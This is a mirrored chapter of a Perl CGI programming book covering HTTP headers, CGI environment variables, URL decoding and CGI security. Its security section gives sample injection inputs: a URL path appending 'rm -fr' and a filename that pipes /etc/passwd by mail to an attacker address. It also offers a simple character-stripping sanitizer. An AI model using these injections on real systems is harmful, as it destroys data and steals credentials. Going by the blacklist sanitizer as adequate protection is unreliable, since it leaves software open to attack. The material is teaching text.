📄 ch19.htm

📁 prrl 5 programs codes in the book
💻 HTM
📖 第 1 页 / 共 5 页
字号:

<TR><TD WIDTH=166>Text</TD><TD WIDTH=238>Content Type: text/plain

</TD></TR>

<TR><TD WIDTH=166>HTML page</TD><TD WIDTH=238>Content Type: text/html

</TD></TR>

<TR><TD WIDTH=166>Gif graphic</TD><TD WIDTH=238>Content Type: image/gif

</TD></TR>

<TR><TD WIDTH=166>Redirection to another Web page</TD><TD WIDTH=238>Location: http://www.foobar.com

</TD></TR>

<TR><TD WIDTH=166>Cookie</TD><TD WIDTH=238>Set-cookie: ...</TD>

</TR>

<TR><TD WIDTH=166>Error Message</TD><TD WIDTH=238>Status: 402 

</TD></TR>

</TABLE>

</CENTER>

<P>

<P>

All HTTP headers must be followed by a blank line. Use the following

line of code as a template:

<BLOCKQUOTE>

<PRE>

print(&quot;Content Type: text/html\n\n&quot;);

</PRE>

</BLOCKQUOTE>

<P>

Notice that the HTTP header is followed by <I>two</I> newline

characters. This is very important. It ensures that a blank line

will always follow the HTTP header.

<P>

If you have installed any helper applications for Netscape or

are familiar with MIME types, you already recognize the <TT>text/plain</TT>

and <TT>text/html</TT> parts of the

<TT>Content Type</TT> header. They

tell the remote Web browser what type of information you are sending.

The two most common MIME types to use are <TT>text/plain</TT>

and <TT>text/html</TT>.

<P>

The <TT>Location</TT> header is used

to redirect the client Web browser to another Web page. For example,

let's say that your CGI script is designed to randomly choose

from among 10 different URLs in  order to determine the next Web

page to display. ONCe the new Web page is chosen, your program

outputs it like this:

<BLOCKQUOTE>

<PRE>

print(&quot;Location: $nextPage\n\n&quot;);

</PRE>

</BLOCKQUOTE>

<P>

ONCe the <TT>Location</TT> header

has been printed, nothing else should be printed. That is all

the information that the client Web browser needs.

<P>

Cookies and the <TT>Set-cookie:</TT>

header are discussed in the &quot;Cookies&quot; section later

in this chapter.

<P>

The last type of HTTP header is the <TT>Status</TT>

header. This header should be sent when an error arises in your

script that your program is not equipped to handle. I feel that

this HTTP header should not be used unless you are under severe

time pressure to complete a project. You should try to create

your own error handling routines that display a full Web page

that explains the error that happened and what the user can do

to fix or circumvent it. You might iNClude the time, date, type

of error, contact names and phone numbers, and any other information

that might be useful to the user. Relying on the standard error

messages of the Web server and browser will make your Web site

less user friendly.

<H2><A NAME="CGIandEnvironmentVariables"><FONT SIZE=5 COLOR=#FF0000>

CGI and Environment Variables</FONT></A></H2>

<P>

You are already familiar with environment variables if you read

<A HREF="ch12.htm" tppabs="http://cheminf.nankai.edu.cn/~eb~/Perl%205%20By%20Example/ch12.htm" >Chapter 12</A>, &quot;Using Special Variables.&quot; When your CGI

program is started, the Web server creates and initializes a number

of environment variables that your program can access using the

<TT>%ENV</TT> hash.

<P>

Table 19.2 contains a short description of each environment variable.

A complete description of the environmental variables used in

CGI programs can be found at

<BLOCKQUOTE>

<PRE>

http://www.ast.cam.ac.uk/~drtr/cgi-spec.html

<BR>



</PRE>

</BLOCKQUOTE>

<P>

<CENTER><B>Table 19.2&nbsp;&nbsp;CGI Environment Variables</B></CENTER>

<p>

<CENTER>

<TABLE BORDERCOLOR=#000000 BORDER=1 WIDTH=80%>

<TR><TD WIDTH=199><I>Variable Name</I></TD><TD WIDTH=391><I>Description</I>

</TD></TR>

<TR><TD WIDTH=199>AUTH_TYPE</TD><TD WIDTH=391>Optionally provides the authentication protocol used to access your script if the local Web server supports authentication and if  authentication was used to access your script.

</TD></TR>

<TR><TD WIDTH=199>CONTENT_LENGTH</TD><TD WIDTH=391>Optionally provides the length, in bytes, of the content provided to the script through the <TT>STDIN </TT>file handle. Used particularly in the <TT>POST</TT> method of form processing. See <A 
HREF="ch20.htm" tppabs="http://cheminf.nankai.edu.cn/~eb~/Perl%205%20By%20Example/ch20.htm" >Chapter 20</A>, &quot;Form Processing,&quot; for more information.

</TD></TR>

<TR><TD WIDTH=199>CONTENT_TYPE</TD><TD WIDTH=391>Optionally provides the type of content available from the <TT>STDIN</TT> file handle. This is used for the <TT>POST</TT> method of form processing. Most of the time, this variable will be blank and you can 
assume a value of <TT>application/octet-stream</TT>. 

</TD></TR>

<TR><TD WIDTH=199>GATEWAY_INTERFACE</TD><TD WIDTH=391>Provides the version of CGI supported by the local Web server. Most of the time, this will be equal to <TT>CGI/1.1</TT>.

</TD></TR>

<TR><TD WIDTH=199>HTTP_AccEPT</TD><TD WIDTH=391>Provides a comma-separated list of MIME types the browser software will accept. You might check this environmental variable to see if the client will accept a certain kind of graphic file.

</TD></TR>

<TR><TD WIDTH=199>HTTP_FORM</TD><TD WIDTH=391>Provides the user's e-mail address. Not all Web browsers will supply this information to your server. Therefore, use this field only to provide a default value for an HTML form.

</TD></TR>

<TR><TD WIDTH=199>HTTP_USER_AGENT</TD><TD WIDTH=391>Provides the type and version of the user's Web browser. For example, the Netscape Web browser is called Mozilla.

</TD></TR>

<TR><TD WIDTH=199>PATH_INFO</TD><TD WIDTH=391>Optionally contains any extra path information from the HTTP request that invoked the script.

</TD></TR>

<TR><TD WIDTH=199>PATH_TRANSLATED</TD><TD WIDTH=391>Maps the script's virtual path (i.e., from the root of the server directory) to the physical path used to call the script.

</TD></TR>

<TR><TD WIDTH=199>QUERY_STRING</TD><TD WIDTH=391>Optionally contains form information when the GET method of form processing is used. QUERY_STRING is also used for passing information such as search keywords to CGI scripts.

</TD></TR>

<TR><TD WIDTH=199>REMOTE_ADDR</TD><TD WIDTH=391>Contains the dotted decimal address of the user.

</TD></TR>

<TR><TD WIDTH=199>REMOTE_HOST</TD><TD WIDTH=391>Optionally provides the domain name for the site that the user has connected from.

</TD></TR>

<TR><TD WIDTH=199>REMOTE_IDENT</TD><TD WIDTH=391>Optionally provides client identification when your local server has contacted an IDENTD server on a client machine. You will very rarely see this because the IDENTD query is slow.

</TD></TR>

<TR><TD WIDTH=199>REMOTE_USER</TD><TD WIDTH=391>Optionally provides the name used by the user to access your secured script. 

</TD></TR>

<TR><TD WIDTH=199>REQUEST_METHOD</TD><TD WIDTH=391>Usually contains either &quot;GET&quot; or &quot;POST&quot;-the method by which form information will be made available to your script. See <A HREF="ch20.htm" tppabs="http://cheminf.nankai.edu.cn/~eb~/Perl%205%20By%20Example/ch20.htm" >Chapter 20</A>, &quot;Form Processing,&quot; 
for more information.

</TD></TR>

<TR><TD WIDTH=199>SCRIPT_NAME</TD><TD WIDTH=391>Contains the virtual path to the script.

</TD></TR>

<TR><TD WIDTH=199>SERVER_NAME</TD><TD WIDTH=391>Contains the configured hostname for the server.

</TD></TR>

<TR><TD WIDTH=199>SERVER_PORT</TD><TD WIDTH=391>Contains the port number that the local Web server software is listening on. The standard port number is 80.

</TD></TR>

<TR><TD WIDTH=199>SERVER_PROTOCOL</TD><TD WIDTH=391>Contains the version of the Web protocol this server uses. For example, <TT>HTTP/1.0</TT>.

</TD></TR>

<TR><TD WIDTH=199>SERVER_SOFTWARE</TD><TD WIDTH=391>Contains the name and version of the Web server software. For example, <TT>WebSite/1.1e</TT>.

</TD></TR>

</TABLE>

</CENTER>

<P>

<H2><A NAME="URLENCoding"><FONT SIZE=5 COLOR=#FF0000>

URL ENCoding</FONT></A></H2>

<P>

One of the limitations that the WWW organizations have placed

on the HTTP protocol is that the content of the commands, responses,

and data that are passed between client and server should be clearly

defined. It is sometimes difficult to tell simply from the context

whether a space character is a field delimiter or an actual space

character to add whitespace between two words.

<P>

To clear up the ambiguity, the URL eNCoding scheme was created.

Any spaces are converted into plus (<TT>+</TT>)

signs to avoid semantic ambiguities. In addition, special characters

or 8-bit values are converted into their hexadecimal equivalents

and prefaced with  a percent sign (<TT>%</TT>).

For example, the string <TT>Davy Jones &lt;dj@planet.net&gt;</TT>

is eNCoded as <TT>Davy+Jones+%3Cdj@planet.net%3E</TT>.

If you look closely, you see that the <TT>&lt;</TT>

character has been converted to <TT>%3C</TT>

and the <TT>&gt;</TT> character has

been coverted to <TT>%3E</TT>.

<P>

Your CGI script will need to be able to convert URL eNCoded information

back into its normal form. Fortunately, Listing 19.2 contains

a fuNCtion that will convert URL eNCoded.

<P>

<IMG SRC="pseudo.gif" tppabs="http://cheminf.nankai.edu.cn/~eb~/Perl%205%20By%20Example/pseudo.gif" BORDER=1 ALIGN=RIGHT><p>

<BLOCKQUOTE>

<I>Define the </I><TT><I>decodeURL()</I></TT><I>

fuNCtion.<BR>

Get the eNCoded string from the parameter array.<BR>

Translate all plus signs into spaces.<BR>

Convert character coded as hexadecimal digits into regular characters.

<BR>

Return the decoded string.</I>

</BLOCKQUOTE>

<HR>

<BLOCKQUOTE>

<B>Listing 19.2&nbsp;&nbsp;19LST02.PL-How to Decode the URL ENCoding

<BR>

</B>

</BLOCKQUOTE>

<BLOCKQUOTE>

<PRE>

sub decodeURL {

    $_ = shift;

    tr/+/ /;

    s/%(..)/pack('c', hex($1))/eg;

    return($_);

}

</PRE>

</BLOCKQUOTE>

<HR>

<P>

This fuNCtion will be used in <A HREF="ch20.htm" tppabs="http://cheminf.nankai.edu.cn/~eb~/Perl%205%20By%20Example/ch20.htm" >Chapter 20</A>, &quot;Form Processing,&quot;

to decode form information. It is presented here because canned

queries also use URL eNCoding.

<H2><A NAME="Security"><FONT SIZE=5 COLOR=#FF0000>

Security</FONT></A></H2>

<P>

CGI really has only one large security hole that I can see. If

you pass information that came from a remote site to an operating

system command, you are asking for trouble. I think an example

is needed to understand the problem because it is not obvious.

<P>

Suppose that you had a CGI script that formatted a directory listing

and generated a Web page that let visitors view the listing. In

addition, let's say that the name of the directory to display

was passed to your program using the <TT>PATH_INFO</TT>

environment variable. The following URL could be used to call

your program:

<BLOCKQUOTE>

<PRE>

http://www.foo.com/cgi-bin/dirlist.pl/docs

</PRE>

</BLOCKQUOTE>

<P>

Inside your program, the <TT>PATH_INFO</TT>

environment variable is set to <TT>docs</TT>.

In order to get the directory listing, all that is needed is a

call to the <TT>ls</TT> command in

UNIX or the <TT>dir</TT> command in

DOS. Everything looks good, right?

<P>

But what if the program was invoked with this command line?

<BLOCKQUOTE>

<PRE>

http://www.foo.com/cgi-bin/dirlist.pl/; rm -fr;

</PRE>

</BLOCKQUOTE>

<P>

Now, all of a sudden, you are faced with the possibility of files

being deleted because the semi-colon (;) lets multiple commands

be executed on one command line.

<P>

This same type of security hole is possible any time you try to

run an external command. You might be tempted to use the <TT>mail</TT>,

<TT>sendmail</TT>, or <TT>grep</TT>

commands to save time while writing your CGI program, but because

all of these programs are easily duplicated using Perl, try to

resist the temptation.

<P>

Another security hole is related to using external data to open

or create files. Some enterprising hacker could use <TT>&quot;|

mail hacker@hacker.com &lt; /etc/passwd&quot;</TT> as the

filename to mail your password file or any other file to himself.

<P>

All of these security holes can be avoided by removing the dangerous

characters (like the | or pipe character).

<P>

<IMG SRC="pseudo.gif" tppabs="http://cheminf.nankai.edu.cn/~eb~/Perl%205%20By%20Example/pseudo.gif" BORDER=1 ALIGN=RIGHT><p>

<BLOCKQUOTE>

<I>Define the </I><TT><I>improveSecurity()</I></TT><I>

fuNCtion.<BR>

Copy the passed string into </I><TT><I>$_</I></TT><I>,

the default search space.<BR>

Protect against command-line options by removing </I><TT><I>-</I></TT><I>

and </I><TT><I>+</I></TT><I> characters.

<BR>

Additional protection against command-line options.<BR>

Convert all dangerous characters into harmless underscores.<BR>

Return the </I><TT><I>$_</I></TT><I>

variable.</I>

</BLOCKQUOTE>

<P>

Listing 19.3 shows how to remove dangerous characters.

<HR>

<BLOCKQUOTE>

<B>Listing 19.3&nbsp;&nbsp;19LST03.PL-How to Remove Dangerous

Characters<BR>

</B>

</BLOCKQUOTE>

<BLOCKQUOTE>

<PRE>

sub improveSecurity {

    $_ = shift;

    s/\-+(.*)/\1/g;

    s/(.*)[ \t]+\-(.*)/\1\2/g;

    tr/\$\'\`\&quot;\&lt;\&gt;\/\;\!\|/_/;

    return($_);

}

</PRE>

</BLOCKQUOTE>

<HR>

<H2><A NAME="CGIwrapandSecurity"><FONT SIZE=5 COLOR=#FF0000>

CGIwrap and Security</FONT></A></H2>

<P>

CGIwrap (<B>http://wwwcgi.umr.edu/~cgiwrap/</B>) is a UNIX-based

utility written by Nathan Neulinger that lets general users run

CGI scripts without needing access to the server's <TT>cgi-bin</TT>

directory. Normally, all scripts must be located in the server's

main <TT>cgi-bin</TT> directory and

all run with the same UID (user ID) as the Web server. CGIwrap

performs various security checks on the scripts before changing

ID to match the owner of the script. All scripts are executed

with same the user ID as the user who owns them. CGIwrap works

with NCSA, Apache, CERN, Netsite, and probably any other UNIX

Web server.

<P>

Any files created by a CGI program are normally owned by the Web

server. This can cause a problem if you need to edit or remove

files created by CGI programs. You might have to ask the system

administrator for help because you lack the proper auhorization.

All CGI programs have the same system permissions as the Web server.

If you run your Web server under the root user ID-being either

very brave or very foolish-a CGI program could be tricked into

erasing the entire hard drive. CGIwrap provides a way around these

problems.

<P>

With CGIwrap, scripts are located in users' <TT>public_html/cgi-bin</TT>
⌨️ 快捷键说明

复制代码 Ctrl + C
搜索代码 Ctrl + F
全屏模式 F11
切换主题 Ctrl + Shift + D
显示快捷键 ?
增大字号 Ctrl + =
减小字号 Ctrl + -